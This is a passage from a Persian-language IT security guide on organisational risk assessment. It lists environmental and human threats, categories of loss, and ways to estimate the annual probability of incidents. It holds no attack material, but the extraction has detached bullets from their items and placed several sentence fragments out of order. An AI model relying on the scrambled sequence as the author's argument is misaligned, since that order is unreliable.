ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴﺴﺖ ﻭ ﻛﻠﻴﺔ ﺭﺍﻫﻬﺎ ﺑﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﭼﻨـﻴﻦ ﻛـﺎﺭﻱ ﺑﺎﻳـﺪ
ﻣﺴﺪﻭﺩ ﺷﺪﻩ ﺑﺎﺷﻨﺪ.
ﺷﻨﺎﺳﺎﻳﻲ ﺗﻬﺪﻳﺪﺍﺕ
ﻣﺮﺣﻠﺔ ﺑﻌﺪﻱ ﺗﻌﻴﻴﻦ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺗﻬﺪﻳﺪﺍﺕ ﻣﻮﺟﻮﺩ ﺑﺮﺍﻱ ﺩﺍﺭﺍﻳـﻲ
ﺷﻤﺎ ﻣﻲﺑﺎﺷﺪ .ﺑﺮﺧـﻲ ﺍﺯ ﺗﻬﺪﻳـﺪﺍﺕ ﻣﺤﻴﻄـﻲ ﻫـﺴﺘﻨﺪ ﻭ ﺷـﺎﻣﻞ
ﺁﺗﺶﺳﻮﺯﻱ ،ﺯﻟﺰﻟﻪ ،ﺍﻧﻔﺠﺎﺭ ﻭ ﺳﻴﻞ ﻣﻲﺷﻮﻧﺪ .ﺍﻳﻦ ﻓﻬﺮﺳﺘﻬﺎ ﺑﺎﻳـﺪ
ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺑﺴﻴﺎﺭ ﻧﺎﺩﺭ ﺍﻣﺎ ﻣﻤﻜﻦ ﻫﻢ ﺑﺎﺷﻨﺪ؛ ﻣﺜﻞ ﺑـﺮﻭﺯ ﻧﻘـﺺ
ﻛﻠﻲ ﺩﺭ ﺳﺎﺧﺘﻤﺎﻥ ﻳﺎ ﭘﻴﺪﺍﺷﺪﻥ ﻣﻮﺍﺩ ﺁﺗـﺸﺰﺍ ﺩﺭ ﺩﻳﻮﺍﺭﻫـﺎﻱ ﺍﺗـﺎﻕ
ﺭﺍﻳﺎﻧﻪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﺭﺍ ﺑﺮﺍﻱ ﻣﺪﺗﻲ ﻧﻪﭼﻨﺪﺍﻥ ﻛﻮﺗﺎﻩ ﻭﺍﺩﺍﺭ
ﺑﻪ ﺗﺨﻠﻴﺔ ﺍﺗﺎﻕ ﻧﻤﺎﻳﺪ .ﺳﺎﻳﺮ ﺗﻬﺪﻳﺪﺍﺕ ﺍﺯ ﻛﺎﺭﻛﻨﺎﻥ ﻭ ﺍﻓـﺮﺍﺩ ﺧـﺎﺭﺝ
ﺳﺎﺯﻣﺎﻥ ﻧﺸﺄﺕ ﻣﻲﮔﻴﺮﻧﺪ .ﺩﺭ ﺍﻳﻨﺠﺎ ﻣﺜﺎﻟﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺍﻳﻦ ﺩﺳـﺘﻪ ﺍﺯ
ﺗﻬﺪﻳﺪﺍﺕ ﺫﻛﺮ ﺷﺪﻩﺍﻧﺪ:
•
•
•
•
•
•
•
ﻣﻮﺍﺭﺩ ﻏﻴﺮﻣﻠﻤﻮﺱ:
o
o
o
o
•
•
ﺍﻣﻨﻴﺖ ﻭ ﺳﻼﻣﺖ ﻛﺎﺭﻛﻨﺎﻥ؛
ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻛﺎﺭﺑﺮﺍﻥ؛
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭﻛﻨﺎﻥ؛
ﻭﺟﻬﺔ ﻋﻤﻮﻣﻲ ﻭ ﺍﻋﺘﺒﺎﺭ ﺳﺎﺯﻣﺎﻥ؛
•
•
•
•
Business Plan
69
ﺑﻴﻤﺎﺭﻱ ﺍﻓﺮﺍﺩ ﻛﻠﻴﺪﻱ؛
ﺑﻴﻤﺎﺭﻱ ﻫﻤﺰﻣﺎﻥ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺎﺭﻛﻨـﺎﻥ )ﻧﻈﻴـﺮ ﺑﻴﻤﺎﺭﻳﻬـﺎﻱ
ﻣﺴﺮﻱ ﻣﺜﻞ ﺁﻧﻔﻮﻻﻧﺰﺍ(؛
ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﭘﺮﺳﻨﻞ ﻛﻠﻴﺪﻱ )ﻣـﺮﮒ ،ﺑﺎﺯﻧﺸـﺴﺘﮕﻲ ،ﭘﺎﻳـﺎﻥ
ﻳﺎﻓﺘﻦ ﺩﻭﺭﺓ ﻛﺎﺭﻱ(؛
ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﺧﺪﻣﺎﺕ ﺗﻠﻔﻦ ﻳﺎ ﺷﺒﻜﻪ؛
ﻗﻄﻊ ﺧﺪﻣﺎﺕ ﺷﻬﺮﻱ )ﺗﻠﻔﻦ ،ﺑﺮﻕ ،ﺁﺏ( ﺑﺮﺍﻱ ﻣﺪﺗﻲ ﻛﻮﺗﺎﻩ؛
ﻗﻄﻊ ﺧﺪﻣﺎﺕ ﺷﻬﺮﻱ ﺑﺮﺍﻱ ﻣﺪﺕ ﻃﻮﻻﻧﻲ؛
ﺻﺎﻋﻘﻪ؛
ﺳﻴﻞ؛
ﺳﺮﻗﺖ ﺩﻳﺴﻜﻬﺎ ﻳﺎ ﻧﻮﺍﺭﻫﺎ؛
ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﺔ ﻛﻴﻔﻲ ﻳﻚ ﻓﺮﺩ ﻛﻠﻴﺪﻱ؛
ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﺔ ﺧﺎﻧﮕﻲ ﻳﻚ ﻓﺮﺩ ﻛﻠﻴﺪﻱ؛
ﻭﺭﻭﺩ ﻳﻚ ﻭﻳﺮﻭﺱ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ؛
ﻭﺭﺷﻜـﺴﺘﮕﻲ ﻓﺮﻭﺷــﻨﺪﮔﺎﻥ ﻳـﺎ ﺷــﺮﻛﺘﻬﺎﻱ ﺍﺭﺍﺋـﻪﺩﻫﻨــﺪﺓ
ﺧﺪﻣﺎﺕ ﻛﻠﻴﺪﻱ ﻃﺮﻑ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺎ ﺷﻤﺎ؛
١٤٣
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
•
•
•
•
•
•
•
•
ﺍﺷﻜﺎﻻﺕ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ؛
ﺍﺷﻜﺎﻻﺕ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ؛
ﺧﺮﺍﺑﻜﺎﺭﻱ ﻛﺎﺭﻣﻨﺪﺍﻥ؛
ﻼ ﻛﺎﺭﻣﻨـﺪ ﺑﺨـﺶ
ﺧﺮﺍﺑﻜﺎﺭﻱ ﭘﺮﺳـﻨﻞ ﺷـﺨﺺ ﺛﺎﻟـﺚ )ﻣـﺜ ﹰ
ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ(؛
ﺍﻏﺘﺸﺎﺵ ﻛﺎﺭﻛﻨﺎﻥ؛
ﻣﻬﺎﺟﻤﻴﻨﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ﺗـﺼﺎﺩﻓﻲ ﺑـﻪ ﻣﺎﺷـﻴﻨﻬﺎﻱ ﺷـﻤﺎ
ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ؛
ﻛــﺎﺭﺑﺮﺍﻧﻲ ﻛــﻪ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧــﺖ ﺍﻃﻼﻋــﺎﺕ ﺳــﺎﺯﻣﺎﻧﻲ
ﺗﺤﺮﻳﻚﻛﻨﻨﺪﻩ ﻳﺎ ﺍﻧﺤﺼﺎﺭﻱ ﻣﻲﻓﺮﺳﺘﻨﺪ؛ ﻭ
ﺟﺎﺳﻮﺳﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﺔ ﺗﺠﺎﺭﻱ.
ﻣﺤﺎﺳﺒﺔ ﻣﺨﺎﻃﺮﺍﺕ
•
•
•
•
•
•
•
•
ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ
•
ﺗﻌﻴﻴﻦ ﻫﺰﻳﻨﺔ ﺧﺴﺎﺭﺗﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺴﻴﺎﺭ ﺳـﺨﺖ ﺑﺎﺷـﺪ .ﻳـﻚ
ﺷﻴﻮﺓ ﺳﺎﺩﺓ ﻣﺤﺎﺳﺒﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺗﻨﻬﺎ ﻫﺰﻳﻨﺔ ﺗﻌﻤﻴﺮ ﻳﺎ ﺗﻌـﻮﻳﺾ
•
ﺩﺭ ﺩﺳﺘﺮﺱ ﻧﺒﻮﺩﻥ ﺩﺭ ﻛﻮﺗﺎﻩﻣﺪﺕ )ﻛﻤﺘﺮ ﺍﺯ ۷ﺗﺎ ۱۰ﺭﻭﺯ(؛
ﺩﺭ ﺩﺳﺘﺮﺱ ﻧﺒﻮﺩﻥ ﺩﺭ ﻣﻴﺎﻥﻣﺪﺕ ) ۱ﺍﻟﻲ ۲ﻫﻔﺘﻪ(؛
ﺩﺭ ﺩﺳﺘﺮﺱ ﻧﺒﻮﺩﻥ ﺩﺭ ﺩﺭﺍﺯﻣﺪﺕ )ﺑﻴﺶ ﺍﺯ ۲ﻫﻔﺘﻪ(؛
ﺯﻳﺎﻥ ﻳﺎ ﺗﺨﺮﻳﺐ ﺩﺍﺋﻤﻲ؛
ﺯﻳﺎﻥ ﻳﺎ ﺗﺨﺮﻳﺐ ﺗﺼﺎﺩﻓﻲ؛
ﺯﻳﺎﻥ ﻳﺎ ﺗﺨﺮﻳﺐ ﺗﻌﻤﺪﻱ؛
ﺍﻓﺸﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﻃﻼﻋﺎﺕ ﺩﺭﻭﻥ ﺳﺎﺯﻣﺎﻥ؛
ﺍﻓﺸﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ؛
ﺍﻓﺸﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﻭ ﻛﺎﻣﻞ ﺍﻃﻼﻋـﺎﺕ ﺑـﺮﺍﻱ ﻫﻤـﺔ ﻣﻨـﺎﺑﻊ
ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ،ﺭﻗﺒﺎ ﻭ ﻣﻄﺒﻮﻋﺎﺕ؛ ﻭ
ﻫﺰﻳﻨﺔ ﺟﺎﻳﮕﺰﻳﻨﻲ ﻳﺎ ﺗﺮﻣﻴﻢ.
ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﻥ
۷۰
ﺗﻐﻴﻴﺮﺍﺕ ﺩﺭ ﻛﺎﺭﻛﻨﺎﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺳﺘﺨﺪﺍﻡ ﻭ ﺑﺎﺯﻧﺸﺴﺘﮕﻲ ﺗﻌﺪﺍﺩ ﺯﻳـﺎﺩﻱ ﺍﺯ
ﺍﻓﺮﺍﺩ ﺑﺎﺷﺪ ،ﻳﺎ ﺑﺎﺯﻧﺸﺴﺘﮕﻲ ﻳﻜﻲ ﺍﺯ ﻛﺴﺎﻧﻴﻜﻪ ﺩﺭ ﻃﺮﺡ ﺍﻣﻨﻴـﺖ ﺳـﺎﺯﻣﺎﻥ
ﻓﻌﺎﻟﻴﺖ ﺩﺍﺷﺘﻪ ﺍﺳـﺖ .ﺗﻐﻴﻴـﺮﺍﺕ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﻧـﺼﺐ ﭼﻨـﺪ
ﺳﻴﺴﺘﻢ ﺟﺪﻳﺪ ﺑﺎﺷﺪ .ﺍﮔﺮ ۱۰۰ﺭﺍﻳﺎﻧﻪ ﺩﺍﺭﻳﺪ ﻭ ﺑﺎ ﺭﻋﺎﻳﺖ ﺍﺻﻮﻝ ﺍﻳﻤﻨﻲ ۱
ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﺿﺎﻓﻪ ﻣﻲﻛﻨﻴﺪ ،ﺍﺭﺯﻳﺎﺑﻲ ﻣﺠﺪﺩ ﻣﺨـﺎﻃﺮﺍﺕ ﺿـﺮﻭﺭﻱ
ﻼ ۱۰ﺭﺍﻳﺎﻧﻪ ﺩﺍﺭﻳﺪ ﻭ ۱۰ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮ ﺍﺿﺎﻓﻪ ﻣﻲﻛﻨﻴﺪ،
ﻧﻴﺴﺖ ،ﺍﻣﺎ ﺍﮔﺮ ﻣﺜ ﹰ
ﻼ ﺟﺪﻳـﺪ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ ﺷـﻤﺎ
ﺍﻳﻦ ﺗﻮﺳﻌﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﺟﻨﺒـﺔ ﻛـﺎﻣ ﹰ
ﺑﻮﺟﻮﺩ ﺑﻴﺎﻭﺭﺩ .ﺗﻐﻴﻴﺮﺍﺕ ﺩﻳﮕﺮ ﺳﻴﺴﺘﻤﻬﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺷـﺎﻣﻞ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ
ﺷﺒﻜﻪﻫﺎﻱ ﺟﺪﻳـﺪ ﺩﺍﺧﻠـﻲ ﻭ ﺧـﺎﺭﺟﻲ ،ﺍﺭﺗﻘـﺎﻱ ﺳﻴـﺴﺘﻤﻬﺎ ،ﻳـﺎ ﺍﻳﺠـﺎﺩ
ﺗﻐﻴﻴﺮﺍﺕ ﺩﺭ ﺑﺴﺘﺮ ﻋﻤﻠﻴﺎﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺎﺷـﻨﺪ .ﺗﻐﻴﻴـﺮﺍﺕ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ ﻧﻴـﺰ
ﻣﻌﻤﻮ ﹰﻻ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﺭﺷﺪ ﺳـﺮﻳﻊ ،ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ ﺑـﺎ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﻳـﺎ
ﻣﺸﺘﺮﻳﺎﻥ ﺧﺎﺭﺟﻲ ،ﻭ ﻧﻴﺰ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺎﺯﺍﺭﻳﺎﺑﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺷـﻤﺎ ﺭﺍ
ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﻣﺤﻠﻲ ﻭ ﺟﻬﺎﻧﻲ ﺑﻴﺸﺘﺮ ﺟﺎ ﺑﻴﺎﻧﺪﺍﺯﻧﺪ.
ﭘﺲ ﺍﺯ ﺍﻳﻨﻜﻪ ﺗﻬﺪﻳﺪﺍﺕ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﺮﺩﻳﺪ ﺑﺎﻳﺪ ﺍﺣﺘﻤﺎﻝ ﺭﺧـﺪﺍﺩ
ﻫﺮ ﺍﺗﻔﺎﻕ ﺭﺍ ﺗﺨﻤﻴﻦ ﺑﺰﻧﻴﺪ .ﺗﺨﻤـﻴﻦ ﺳـﺎﻻﻧﺔ ﺍﻳـﻦ ﺗﻬﺪﻳـﺪﺍﺕ ﺍﺯ
ﺳﺎﺩﻩﺗﺮﻳﻦ ﺭﻭﺷﻬﺎ ﺍﺳﺖ .ﺗﻌﻴﻴﻦ ﻛﻤﻴﺖ ﻳﻚ ﻣﺨﺎﻃﺮﻩ ﻛﺎﺭ ﺑـﺴﻴﺎﺭ
ﺩﺷﻮﺍﺭﻱ ﺍﺳﺖ .ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻃﺮﻳﻖ ﺷﺮﻛﺘﻬﺎﻱ ﺩﻳﮕـﺮ )ﻣﺜـﻞ
ﺷﺮﻛﺖ ﺑﻴﻤﻪ( ﺍﻳﻦ ﺑﺮﺁﻭﺭﺩﻫﺎ ﺭﺍ ﺑﺪﺳـﺖ ﺁﻭﺭﻳـﺪ .ﺍﮔـﺮ ﻭﺍﻗﻌـﻪ ﺑـﺮﺍﻱ
ﭼﻨﺪ ﺑﺎﺭ ﻣﺘﻮﺍﻟﻲ ﺭﺥ ﺩﺍﺩﻩ ﺑﺎﺷﺪ ،ﺑﺮ ﺍﺳﺎﺱ ﺳﻮﺍﺑﻖ ﻧﻴـﺰ ﻣـﻲﺗـﻮﺍﻥ
ﻻ ﺁﻣﺎﺭﻫـﺎﻳﻲ ﺟﻤـﻊ-
ﺁﻧﺮﺍ ﺗﺨﻤﻴﻦ ﺯﺩ .ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺻﻨﻌﺘﻲ ﻣﻌﻤـﻮ ﹰ
ﺁﻭﺭﻱ ﻭ ﮔﺰﺍﺭﺷﺎﺗﻲ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ .ﺷﻤﺎ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺣﺪﺳﻴﺎﺕ
ﺧﻮﺩ ﺭﺍ ﺑﺮ ﺍﺳﺎﺱ ﺗﺠﺮﺑﻴﺎﺕ ﮔﺬﺷﺘﻪ ﺑﻪ ﻭﺍﻗﻌﻴـﺖ ﻧﺰﺩﻳﻜﺘـﺮ ﻛﻨﻴـﺪ.
ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ:
ﺑﺨﺶ ﺳﻮﻡ
ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﺍﺕ ﻧﺒﺎﻳﺪ ﺗﻨﻬﺎ ﻳﻜﺒـﺎﺭ ﺍﻧﺠـﺎﻡ ﺷـﻮﺩ ﻭ ﭘـﺲ ﺍﺯ ﺁﻥ
ﻓﺮﺍﻣﻮﺵ ﮔﺮﺩﺩ ،ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﻫﻤﻮﺍﺭﻩ ﻭ ﺑﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ -ﺣـﺪﺍﻗﻞ
ﻳﻜﺒﺎﺭ ﺩﺭ ﺳﺎﻝ ﻳﺎ ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺗﻐﻴﻴﺮﺍﺕ ﻋﻤـﺪﻩﺍﻱ ﺩﺭ ﻛﺎﺭﻛﻨـﺎﻥ،
ﺳﻴﺴﺘﻤﻬﺎ ﻳﺎ ﻣﺤﻴﻂ ﻋﻤﻠﻴﺎﺗﻲ ﺻﻮﺭﺕ ﻣـﻲﭘـﺬﻳﺮﺩ -ﺁﻧـﺮﺍ ﺍﻧﺠـﺎﻡ
ﺩﻫﻴﺪ ٧٠.ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺗﻐﻴﻴـﺮ ﺟـﺪﻱ ﺩﺭ ﺳـﺎﺧﺘﺎﺭ ﻳـﺎ
ﻋﻤﻠﻴﺎﺕ ﺭﺥ ﻣﻲﺩﻫﺪ ﻣﺠﺪﺩﹰﺍ ﺑﺎﻳﺪ ﺗﻬﺪﻳﺪﺍﺕ ﺭﺍ ﻣﻮﺭﺩ ﺍﺭﺯﻳﺎﺑﻲ ﻗـﺮﺍﺭ
ﺩﺍﺩ .ﻟﺬﺍ ﺍﮔﺮ ﺷﻤﺎ ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﻣﺠـﺪﺩ ﻣـﻲﻛﻨﻴـﺪ ،ﺑـﻪ ﺳـﺎﺧﺘﻤﺎﻥ
ﺟﺪﻳـﺪ ﻣـﻲﺭﻭﻳـﺪ ،ﻓﺮﻭﺷــﻨﺪﮔﺎﻥ ﻃـﺮﻑ ﻗـﺮﺍﺭﺩﺍﺩ ﺧـﻮﺩ ﺭﺍ ﺗﻐﻴﻴــﺮ
ﻣﻲﺩﻫﻴﺪ ﻭ ﻳﺎ ﺗﻐﻴﻴﺮ ﺟﺪﻱ ﺩﻳﮕـﺮﻱ ﺭﺍ ﺍﻳﺠـﺎﺩ ﻣـﻲﻧﻤﺎﻳﻴـﺪ ،ﺑﺎﻳـﺪ
ﻣﺠﺪﺩﹰﺍ ﺗﻬﺪﻳﺪﺍﺕ ﻭ ﺁﺳﻴﺒﻬﺎﻱ ﺑﺎﻟﻘﻮﻩ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻴﺪ.
ﺗﺠﻬﻴﺰﺍﺕ ﻭ ﻣﺤﺼﻮﻻﺕ ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻛﻨﻴﻢ .ﻳﻚ ﺷﻴﻮﺓ ﭘﻴﭽﻴﺪﻩﺗـ ﹺﺮ
ﺍﺣﺘﺴﺎﺏ ﻫﺰﻳﻨـﻪﻫـﺎﻱ ﻋـﺪﻡ ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ ،ﺁﻣـﻮﺯﺵ ﻣﺠـﺪﺩ،
ﺭﻭﺍﻟﻬﺎﻱ ﺍﺿﺎﻓﻪﺷـﺪﺓ ﻧﺎﺷـﻲ ﺍﺯ ﺁﺳـﻴﺐ ،ﺍﺯ ﺩﺳـﺖ ﺭﻓـﺘﻦ ﺍﻋﺘﺒـﺎﺭ
ﺷﺮﻛﺖ ،ﻭ ﺣﺘﻲ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﺷﺪﻩ ﺑﻪ ﻣﺸﺘﺮﻳﺎﻥ ﺷﺮﻛﺖ ﺍﺳﺖ.
ﺑﻄﻮﺭ ﻛﻠﻲ ﺍﻓﺰﻭﺩﻥ ﻋﻮﺍﻣﻞ ﺟـﺎﻧﺒﻲ ﺑـﻪ ﻣﺤﺎﺳـﺒﺔ ﻫﺰﻳﻨـﻪ ﺑﺎﻋـﺚ
ﺯﺣﻤﺖ ﺑﻴﺸﺘﺮﻱ ﻣﻲﺷﻮﺩ ﻭﻟﻲ ﺩﻗﺖ ﺗﺨﻤﻴﻦ ﺭﺍ ﺑﺎﻻ ﻣـﻲﺑـﺮﺩ .ﺩﺭ
ﺍﻛﺜﺮ ﻣﻮﺍﺭﺩ ﻧﻴﺎﺯﻱ ﺑﻪ ﺗﻌﻴﻴﻦ ﺩﻗﻴﻖ ﺍﺭﺯﺵ ﻭ ﻫﺰﻳﻨﺔ ﻫـﺮ ﻣﺨـﺎﻃﺮﻩ
ﻧﻴﺴﺖ ﻭ ﺩﺭ ﺣﺎﻟﺖ ﻋﺎﺩﻱ ﺍﺧﺘﺼﺎﺹ ﻳﻚ ﺑﺎﺯﻩ ﻳﺎ ﻣﺤﺪﻭﺩﺓ ﻫﺰﻳﻨﻪ
ﺑﺮﺍﻱ ﻫﺮ ﺗﻬﺪﻳﺪ ﻛﻔﺎﻳﺖ ﻣﻲﻛﻨﺪ .ﺑﺮﺧﻲ ﺍﺯ ﺍﻗﻼﻡ ﺁﺳـﻴﺐﺩﻳـﺪﻩ ﺭﺍ
ﻣــﻲﺗــﻮﺍﻥ ﺩﺭ ﺩﺳــﺘﺔ ﺍﻗــﻼﻡ ﻏﻴﺮﻗﺎﺑــﻞ ﺗﻌﻤﻴــﺮ ﻭ ﺟــﺎﻳﮕﺰﻳﻨﻲ ﻳــﺎ
ﺟﺒﺮﺍﻥﻧﺎﭘﺬﻳﺮ ﻗـﺮﺍﺭ ﺩﺍﺩ؛ ﻣﺜـﻞ ﭘـﺎﻙ ﺷـﺪﻥ ﻛﺎﻣـﻞ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﺓ
ﺣﺴﺎﺑﻬﺎ ،ﻳﺎ ﻣﺮﮒ ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﻛﻠﻴﺪﻱ .ﺷـﺎﻳﺪ ﺑﺨﻮﺍﻫﻴـﺪ ﻫﺰﻳﻨـﺔ
ﺍﻳﻦ ﺧﺴﺎﺭﺗﻬﺎ ﺭﺍ ﺑﺎ ﻣﻘﻴﺎﺳﻬﺎ ﻇﺮﻳﻔﺘﺮﻱ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴـﺪ؛
ﻼ ﺑﺮﺍﻱ ﻫﺮﻳـﻚ ﺍﺯ ﻣـﻮﺍﺭﺩ ﺫﻳـﻞ ﻫﺰﻳﻨـﺔ ﺟﺪﺍﮔﺎﻧـﻪﺍﻱ ﺩﺭﻧﻈـﺮ
ﻣﺜ ﹰ
ﺑﮕﻴﺮﻳﺪ:
١٤٤
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
•
ﺷــﺮﻛﺖ ﺑــﺮﻕ ﺑــﺮ ﺍﺳــﺎﺱ ﺗﺠﺮﺑــﺔ ﺳــﺎﻝ ﮔﺬﺷــﺘﺔ ﺧــﻮﺩ
ﺑﺮﺁﻭﺭﺩﻱ ﺍﺯ ﺍﺣﺘﻤﺎﻝ ﻗﻄﻊ ﺑﺮﻕ ﺩﺭ ﺧﻼﻝ ﺳﺎﻝ ﺁﻳﻨﺪﻩ ﺩﺍﺭﺩ.
ﻣﻘﺎﻣﺎﺕ ﻣﺴﺌﻮﻝ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﺨﺎﻃﺮﺓ ﻗﻄﻊ ﺑﺮﻕ ﺑـﺮﺍﻱ
ﭼﻨﺪ ﺛﺎﻧﻴﻪ ،ﭼﻨﺪ ﺩﻗﻴﻘﻪ ،ﻭ ﻳﺎ ﭼﻨﺪ ﺳﺎﻋﺖ ﻣﺤﺎﺳﺒﻪ ﻧﻤﺎﻳﻨﺪ.
•
ﺳﻮﺍﺑﻖ ﭘﺮﺳﻨﻠﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺗﺨﻤـﻴﻦ ﺍﺣﺘﻤـﺎﻝ ﺍﺳـﺘﻌﻔﺎﻱ
ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﻛﻠﻴﺪﻱ ﺑﺨﺶ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻛﻨﺪ.
•
ﺧﻮﺷﺒﻴﻨﺎﻧﻪﺗـﺮﻳﻦ ﺣﺪﺳـﻴﺎﺕ ﺩﺭ ﻣـﻮﺭﺩ ﺗﻜـﺮﺍﺭ ﺗﺠﺮﺑﻴـﺎﺕ
ﮔﺬﺷﺘﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺗﺨﻤﻴﻦ ﺍﺣﺘﻤﺎﻝ ﻛﺸﻒ ﺍﺷﻜﺎﻻﺕ
ﺟﺪﻱ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺷﻤﺎ ﺩﺭ ﺧﻼﻝ ﺳﺎﻝ ﺁﻳﻨـﺪﻩ ﻣـﻮﺭﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ.
ﺍﮔﺮ ﺍﻧﺘﻈﺎﺭ ﺩﺍﺭﻳﺪ ﺣﺎﺩﺛـﻪﺍﻱ ﺑـﻴﺶ ﺍﺯ ﻳﻜﺒـﺎﺭ ﺩﺭ ﺳـﺎﻝ ﺭﺥ ﺩﻫـﺪ،
ﻼ ﺍﮔـﺮ
ﺗﻌﺪﺍﺩ ﺩﻓﻌﺎﺕ ﻭﻗﻮﻉ ﺁﻧﺮﺍ ﺩﺭ ﻃﻮﻝ ﻳﻜﺴﺎﻝ ﺛﺒﺖ ﻛﻨﻴـﺪ .ﻣـﺜ ﹰ
ﻭﻗﻮﻉ ﺯﻟﺰﻟﻪ ﺭﺍ ﺩﺭ ﻫﺮ ۱۰۰ﺳﺎﻝ ﻳﻜﺒﺎﺭ ﭘﻴﺶﺑﻴﻨـﻲ ﻛﻨﻴـﺪ ،ﻃﺒـﻖ
ﺁﻧﭽﻪ ﮔﻔﺘﻪ ﺷﺪ ﺩﺭ ﻓﻬﺮﺳﺖ ﺷﻤﺎ ﻣﻲﺷـﻮﺩ %۱؛ ﺍﮔـﺮ ﺍﻣـﺎ ﺍﻧﺘﻈـﺎﺭ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻃﻲ ﻣﺎﻩ ﺁﻳﻨﺪﻩ ﺳﻪ ﺍﺷﻜﺎﻝ ﺟﺪﻱ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ
Microsoft IISﻛﺸﻒ ﺷﻮﺩ ،ﺧﻮﺍﻫﺪ ﺷﺪ .%۳۶۰۰
ﻫﺰﻳﻨﺔ ﭘﻴﺸﮕﻴﺮﻱ
